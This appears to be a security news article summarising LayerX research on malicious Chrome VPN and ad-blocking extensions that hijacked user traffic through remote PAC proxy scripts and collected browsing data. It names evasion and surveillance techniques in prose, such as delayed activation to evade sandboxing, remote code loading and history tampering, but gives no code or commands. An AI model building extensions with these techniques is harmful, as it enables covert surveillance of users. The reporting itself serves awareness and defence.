9 Million Installs: Malicious Chrome VPN Extensions Hijack User Traffic Via Remote PAC Proxy Injection

Security researchers at LayerX Security have uncovered a long-running malicious campaign involving VPN and ad-blocking browser extensions designed to intercept traffic, exfiltrate browsing data, disable security tools, and redirect users through attacker-controlled servers—all under the guise of “free privacy” tools.

The campaign spans more than six years, has accumulated over 9 million installs, and continues to reappear on the Chrome Web Store despite multiple takedowns.

Earlier versions were removed in May 2025, but a near-identical extension reappeared just two months later—with cleaner code, better evasion, and enhanced surveillance features. At the time of publication, a new variant uploaded in July 2025 remains available in the Chrome Web Store.

What appeared to be harmless “Unlimited Free VPN” tools were in fact powerful, remotely controlled browser implants.

LayerX writes:

“What appeared to be a simple free VPN was, in practice, a full browser-level surveillance mechanism.”

The extensions:

Intercepted and redirected every page the user visited
Installed remote PAC proxy scripts routing all traffic through attacker-controlled servers
Downloaded dynamic code updates and payloads
Collected installed extension lists
Modified browsing history to hide redirects
Disabled other proxy extensions
Persisted through MV3 unloads using tab-injected keepalive scripts

In short, they granted attackers total control over the victim’s web traffic.

LayerX tracked three main extensions:

VPN Professional – Free Secure and Unlimited VPN Proxy
VPN-free.pro – Free Unlimited VPN
Free Unlimited VPN (2025 version, still live)

These extensions accumulated over 9 million installations. The new 2025 extension already has 31,000+ active installs. Their naming, icons, and descriptions all followed the same formula, intended to appear legitimate and professional.

In the older versions (2019–2024), LayerX found several highly suspicious behaviors:

Hijacking String.prototype.trim to silently de-obfuscate URLs
Fetching multi-URL remote configs for real-time updates
Installing PAC proxy scripts from attacker servers
Intercepting every navigation event using webRequest.onBeforeRequest
Dynamic DNR (declarativeNetRequest) rule updates
History tampering via history.replaceState
Self-uninstall triggered remotely to evade analysis
Priority messaging to outrank competing extensions
Service worker persistence to avoid MV3 deactivation

LayerX summarizes:

“These extensions did far more than proxy network requests… functioning as remote-controlled proxy redirectors with concealed update channels.”

The newest variant (July 2025) is more stealthy:

Adds delayed proxy activation (2 seconds) to evade sandboxing
Moves proxy routing logic into runtime-downloaded scripts
Dynamically loads and executes remote code
Disables competing proxy/security extensions
Hashes and uploads URLs visited
Profiles installed extensions for targeted attacks

LayerX confirms the escalation:

“The new version… is notably more advanced and evasive… granting even greater remote control over the user’s browser and traffic.”

According to the researchers, if installed, these extensions could:

Intercept and redirect every page you visit.
Collect browsing data and a list of installed extensions.
Modify or disable other proxy or security tools.
Route traffic through attacker-controlled servers, exposing private activity to potential surveillance.

The campaign also includes six additional ad-blocking and music-downloader extensions with nearly identical malicious code.

These extensions appeared professional, had polished branding, and promised exactly what users wanted. Many victims never suspected that all their web traffic was being piped through an attacker’s server.

1/5 - (1 vote)

Related Posts:

Found this helpful?

Leave a Reply Cancel reply